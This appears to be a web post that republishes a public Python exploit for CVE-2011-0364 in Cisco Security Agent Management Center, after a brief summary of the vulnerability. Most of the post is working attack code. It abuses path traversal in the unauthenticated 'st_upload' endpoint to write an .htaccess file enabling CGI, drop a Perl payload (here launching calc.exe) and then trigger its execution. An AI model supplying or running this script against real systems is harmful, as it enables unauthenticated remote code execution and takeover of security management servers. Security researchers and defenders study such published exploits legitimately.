Cisco Security Agent Management Console ‘st_upload’ RCE Exploit

Cisco Security Agent provides threat protection for server and desktop computing systems. Cisco Security Agent can function in a standalone manner or can be managed by the Management Center for Cisco Security Agent.

The Management Center for Cisco Security Agent is affected by a vulnerability that could allow an unauthenticated attacker to perform remote code execution on the affected device. A successful exploit could allow the attacker to modify agent policies and system configuration and perform other administrative tasks.

Note: This vulnerability can be exploited only by sending certain packets to the web management interface, which by default listens on TCP port 443.

Cisco Security Agent software releases 5.1, 5.2, and 6.0 are affected by this vulnerability.

Below the source of the exploit (Only for test!).

#!/usr/bin/env python
# Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)
# gerry eisenhaur  */
// -->>

import httplib
import mimetools
import StringIO

_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"

# we need to enable some scripting to get command access
htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
backdoor = "exec \"calc.exe\";"

def send_request(params=None):
    buf = StringIO.StringIO()
    headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}

    for(key, value) in params.iteritems():
        buf.write('--%s\r\n' % _boundary)
        buf.write('Content-Disposition: form-data; name="%s"' % key)
        buf.write('\r\n\r\n%s\r\n' % value)
    buf.write('--' + _boundary + '--\r\n\r\n')
    body = buf.getvalue()

    conn = httplib.HTTPSConnection(_csamc)
    conn.request("POST", "/csamc60/agent", body, headers)
    response = conn.getresponse()
    print response.status, response.reason
    conn.close()

def main():
    ### Build up required dir tree
    dirtree = ["../bin/webserver/htdocs/diag/bin",
               "../bin/webserver/htdocs/diag/bin/webserver",
               "../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
    _params = {
        'host_uid': _host_uid,
        'jobname': None,
        'host': "aa",
        'diags': " ",
        'diagsu': " ",
        'profiler': " ",
        'extension': "gee",
    }
    for path in dirtree:
        print "[+] Creating directory: %s" % path
        _params['jobname'] = path
        send_request(_params)

    ### Done building path, drop files
    print "[+] Dropping .htaccess"
    send_request({
        'host_uid': _host_uid,
        'jobname': '',
        'host': "/../bin/webserver/",
        'diags': "",
        'diagsu': "",
        'profiler': htaccess,
        'extension': "/../.htaccess",
    })

    print "[+] Dropping payload"
    send_request({
        'host_uid': _host_uid,
        'jobname': '',
        'host': "/../bin/webserver/htdocs/gerry",
        'diags': perl_path,
        'diagsu': "",
        'profiler': backdoor,
        'extension': "/../exploit.gee",
    })

    print "[+] Done, Executing dropped file."
    try:
        conn = httplib.HTTPSConnection(_csamc, timeout=1)
        conn.request("GET", "/csamc60/exploit.gee")
        response = conn.getresponse()
        print response.status, response.reason
        print response.read()
    except httplib.ssl.SSLError:
        pass
    print "[+] Finished."

if __name__ == '__main__':
    main()

References:

• http://www.cisco.com/…/advisory09186a0080b6cee6.shtml
• http://www.exploit-db.com/exploits/17155/